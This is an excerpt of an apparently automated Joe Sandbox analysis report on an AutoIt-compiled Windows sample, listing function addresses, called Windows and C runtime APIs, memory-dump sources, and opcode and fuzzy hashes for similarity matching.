                                                  • Opcode ID: f6c766eb3ad0243b79ff6d04953f84e3de96b2cbb4bcbf26c543b086eb3e25a2
                                                  • Instruction ID: befd608fdeb20a42d2195f544e6d097ce2ebfe79e97688cd0cc5ee43bd013bcd
                                                  • Opcode Fuzzy Hash: f6c766eb3ad0243b79ff6d04953f84e3de96b2cbb4bcbf26c543b086eb3e25a2
                                                  • Instruction Fuzzy Hash: 42016271801A09EBCF12AF69DC068DE7B61AFD3361F548115F8245A291DB318AE1FFD1
                                                  Function 00C153A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C18B28: __getptd_noexit.LIBCMT ref: 00C18B28
                                                  • __lock_file.LIBCMT ref: 00C153EB
                                                    • Part of subcall function 00C16C11: __lock.LIBCMT ref: 00C16C34
                                                  • __fclose_nolock.LIBCMT ref: 00C153F6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: f5a67abfce431a3bb4baf262a4ed8c0d493b91820b27020d04bc2161a6953406
                                                  • Instruction ID: 101c828feb27e93cdd803e22e03e080186cf56434a47f2a91857e5456d96e713
                                                  • Opcode Fuzzy Hash: f5a67abfce431a3bb4baf262a4ed8c0d493b91820b27020d04bc2161a6953406
                                                  • Instruction Fuzzy Hash: 02F09631904A05DAD710AB6598017ED76A06F83375F648104A434AB1D1CBFC99C5BB51
                                                  Function 00BF8061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00BF542F,?,?,?,?,?), ref: 00BF807A
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00BF542F,?,?,?,?,?), ref: 00BF80AD
                                                    • Part of subcall function 00BF774D: _memmove.LIBCMT ref: 00BF7789
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$_memmove
                                                  • String ID:
                                                  • API String ID: 3033907384-0
                                                  • Opcode ID: 83d6f1732105827a19cd41509c9b54ed13b15851384ec3b6d1a3734396b5a1d5
                                                  • Instruction ID: de5d6fef3a0f162318ec20b9e19c6871b779dff2719a9b5c35736ef07127be99
                                                  • Opcode Fuzzy Hash: 83d6f1732105827a19cd41509c9b54ed13b15851384ec3b6d1a3734396b5a1d5
                                                  • Instruction Fuzzy Hash: 6F01A271205108BFEB246A26DC86FBF3BADEF86360F10807AFA05DE190DE6098449661
                                                  Function 00BFF290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9630d1b62f068aa62a100b437449d154ed03e9b4e93e343d55009f54aac5c57
                                                  • Instruction ID: dc5a70a4c8f9033a7e60bea2ad152a626ade5be1552ec5c2a3efcfb95006188a
                                                  • Opcode Fuzzy Hash: a9630d1b62f068aa62a100b437449d154ed03e9b4e93e343d55009f54aac5c57
                                                  • Instruction Fuzzy Hash: C5619B7060020A9FCB24EF64C881ABBB7F5EF05304F2484BDEA1697291D771EE99DB50
                                                  Function 00C01FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b193d7f738439b4d52c6834a480a147c8f3adef3c378423884a3e6c684792985
                                                  • Instruction ID: 4facc3c2ad4439ebf45b7a33db875ed99edfa197020fa89475aee7b529aec5fc
                                                  • Opcode Fuzzy Hash: b193d7f738439b4d52c6834a480a147c8f3adef3c378423884a3e6c684792985
                                                  • Instruction Fuzzy Hash: 45518130600608AFCF14EF64C995EBE77E6AF45314F1481A8FA169B392DB30EE05DB51
                                                  Function 02281070 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 022808E0: GetFileAttributesW.KERNELBASE(?), ref: 022808EB
                                                  • CreateDirectoryW.KERNELBASE(?,00000000), ref: 022811D5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AttributesCreateDirectoryFile
                                                  • String ID:
                                                  • API String ID: 3401506121-0
                                                  • Opcode ID: 041a6d9bee587e651485e9943635e73f1913fa2043e4ff1c33889d309e21eeed
                                                  • Instruction ID: f755a8a477c4dcb2ddfeeaca869799e6a5c73da83234bd568975744bc1ff95ee
                                                  • Opcode Fuzzy Hash: 041a6d9bee587e651485e9943635e73f1913fa2043e4ff1c33889d309e21eeed
                                                  • Instruction Fuzzy Hash: BC518131A2021896EF14EFA0D844BEE737AEF58300F004569E60DE72C4EB759B95CB66
                                                  Function 00BF5AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00BF5B96
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 79746a13db2a5a0df6859d4aa868165cfc39035c707e43d2840e2e120b2fcf28
                                                  • Instruction ID: d75541e348802952444e2fbd5a2e12e173ac9ada1f1a650ef52ea871e57c8a0d
                                                  • Opcode Fuzzy Hash: 79746a13db2a5a0df6859d4aa868165cfc39035c707e43d2840e2e120b2fcf28
                                                  • Instruction Fuzzy Hash: F3314C31A00A19AFCB28DF6CD484AADF7F5FF48310F1486A9EA1993711D770B994CB90
                                                  Function 00C2FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 5ec569616a677ead53a80d10f79a3074ccf6001df5f5de218b7d57dd63aa2343
                                                  • Instruction ID: 9f2ebd20bb191924d51eaf70645c89b161229131293dedefbdcdc5c952b51c08
                                                  • Opcode Fuzzy Hash: 5ec569616a677ead53a80d10f79a3074ccf6001df5f5de218b7d57dd63aa2343
                                                  • Instruction Fuzzy Hash: F34127B45043559FDB24CF14C494B2ABBE1FF45318F1988ACE9998B762C331E889CF52
                                                  Function 00C106FD Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e602571a50c8cd3fea902fd083a6ea751393e60886a2e5e7eea12d5b2d395db
                                                  • Instruction ID: b0416dc3f5b44aa3ad0bed3e29d9c4c32e11302ea0ed8926320d7458526ac160
                                                  • Opcode Fuzzy Hash: 9e602571a50c8cd3fea902fd083a6ea751393e60886a2e5e7eea12d5b2d395db
                                                  • Instruction Fuzzy Hash: FC21E2364052289FC311AF58EC859D6B7A8FF43B71F214299E4A5CB5B0D7704D8ECBA0
                                                  Function 00BF59B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 3e6e83ae6e3fe16dd294fd676820fa3de3e275a32c0e5609978d921726056653
                                                  • Instruction ID: 4a63428c69db646c30f437a628395fb915cd649ad363a32ab423bb2d3a573517
                                                  • Opcode Fuzzy Hash: 3e6e83ae6e3fe16dd294fd676820fa3de3e275a32c0e5609978d921726056653
                                                  • Instruction Fuzzy Hash: C6210271904A18EBCB109F52F8857AE7FF8FF65350F3188AAE586C6411EBB094E0E741
                                                  Function 00BFC5A7 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp
                                                  • String ID:
                                                  • API String ID: 856254489-0
                                                  • Opcode ID: 54809536a25fe80c226fc27ae408e4954acf569bf4a1f34566957137d398d483
                                                  • Instruction ID: fb1276e7fa53701ffa9a547dee8095859b3a0bcb79df311b1b422f092dd24485
                                                  • Opcode Fuzzy Hash: 54809536a25fe80c226fc27ae408e4954acf569bf4a1f34566957137d398d483
                                                  • Instruction Fuzzy Hash: 8011D23191411CEBCF14EFA9CC429FEB7B8EF51760F0441A6FA11A7190DA309E49CBA0
                                                  Function 00BF3F74 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 72369e1982211c92dc933545f6042ecc7be40b06685db1b5e6ead25ba4749d2f
                                                  • Instruction ID: 10ff3c11370e15586eaa3f44c9df4d26bd83300c332a7bed761698043e7b85ea
                                                  • Opcode Fuzzy Hash: 72369e1982211c92dc933545f6042ecc7be40b06685db1b5e6ead25ba4749d2f
                                                  • Instruction Fuzzy Hash: DE118C716007059FD728DF15D451972B7F5EB8A720B14C8AEE64A8B691DB30E880DA00
                                                  Function 00BF4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00BF4BEF
                                                    • Part of subcall function 00C1525B: __wfsopen.LIBCMT ref: 00C15266
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4E0F
                                                    • Part of subcall function 00BF4B6A: FreeLibrary.KERNEL32(00000000), ref: 00BF4BA4
                                                    • Part of subcall function 00BF4C70: _memmove.LIBCMT ref: 00BF4CBA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                  • String ID:
                                                  • API String ID: 1396898556-0
                                                  • Opcode ID: e1886e0891b7b4ea9fdf70e6097f0ced0dd2e145aa52b1d300e676094b9de09e
                                                  • Instruction ID: 3cc43fd38647a003f8ed4cf4c568da60b9090c4fb50728eddf53c642ff86ea88
                                                  • Opcode Fuzzy Hash: e1886e0891b7b4ea9fdf70e6097f0ced0dd2e145aa52b1d300e676094b9de09e
                                                  • Instruction Fuzzy Hash: 6C11E735600209EBCF14AF74C852FBF77E4AF44710F1088ADF646A7192DB719A09AB51
                                                  Function 00C2FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClearVariant
                                                  • String ID:
                                                  • API String ID: 1473721057-0
                                                  • Opcode ID: 3c494d221abba174857fc5c7c7ed21131f103e5949922dec5d5b0d7073262e2d
                                                  • Instruction ID: 0a461ac59beb7040df1b53e1d88f763c9f9a51f23eac1598f2ac70bedc65513e
                                                  • Opcode Fuzzy Hash: 3c494d221abba174857fc5c7c7ed21131f103e5949922dec5d5b0d7073262e2d
                                                  • Instruction Fuzzy Hash: 222146B4508305DFCB14DF64C484B2ABBE0BF88304F0588ACF98947761C731E859DB92
                                                  Function 00BF774D Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 730e1fc6960c8a9b499141b10db0b85b2c4131eb6f870ca6ded7d7284a446503
                                                  • Instruction ID: 50bd5e536956f5ade2e12b8eb51a13cc2a552c62db94dad102cb5acddb634110
                                                  • Opcode Fuzzy Hash: 730e1fc6960c8a9b499141b10db0b85b2c4131eb6f870ca6ded7d7284a446503
                                                  • Instruction Fuzzy Hash: 3C11E5722092196BD714AF2CD881D7AB3D9EF8932072445AAFE19C7290DF31AC189790
                                                  Function 00BF5BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00BF56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00BF5C16
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 289db3a702e91e69afce8ca048348284a62a444276a04e05d4100c8baab46c21
                                                  • Instruction ID: fa48c3cd7d886e6cd783e19290c0caec410ce5de80efa8da5738bc97984a281a
                                                  • Opcode Fuzzy Hash: 289db3a702e91e69afce8ca048348284a62a444276a04e05d4100c8baab46c21
                                                  • Instruction Fuzzy Hash: 05113A71204B089FD3308F19C880B66B7E8EF44760F10C96DEA9A87A51D770F849CB60
                                                  Function 00BF5A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: b03e4753d7403c99c4e3704000c2eb525c496a1073e7f754d424142a3e49a39a
                                                  • Instruction ID: e7337388bd67f1dc9f47128d8856b0d1c4641b1381a953376ffe2b85e052b8c3
                                                  • Opcode Fuzzy Hash: b03e4753d7403c99c4e3704000c2eb525c496a1073e7f754d424142a3e49a39a
                                                  • Instruction Fuzzy Hash: 59018FB5200902AFC305EB69D481D26F7A9FF8A3107248569FA59C7702DB75EC61DBE0
                                                  Function 00C14863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __lock_file.LIBCMT ref: 00C148A6
                                                    • Part of subcall function 00C18B28: __getptd_noexit.LIBCMT ref: 00C18B28
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock_file
                                                  • String ID:
                                                  • API String ID: 2597487223-0
                                                  • Opcode ID: 7fb484001a537d754893ca074a18750fdc8aff9eda33043465091aaf5bd06584
                                                  • Instruction ID: 5b2be568d4b6bd06b72d421b826221d35c92264792ca7efabcf569e460711ea9
                                                  • Opcode Fuzzy Hash: 7fb484001a537d754893ca074a18750fdc8aff9eda33043465091aaf5bd06584
                                                  • Instruction Fuzzy Hash: DCF0A931900609EBEF15AFA4CC067EE36A1AF43325F158514B424AA1D1CBB88AD2FB91
                                                  Function 00BF4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4E7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: a1131fafebb57f8c75ec73746aa47d33113b01025df003576e3ba84edaaf86d1
                                                  • Instruction ID: a03097cc87c3a2517b93d38db42402497c2e4b73f0116353a08abb1fb4ee7a30
                                                  • Opcode Fuzzy Hash: a1131fafebb57f8c75ec73746aa47d33113b01025df003576e3ba84edaaf86d1
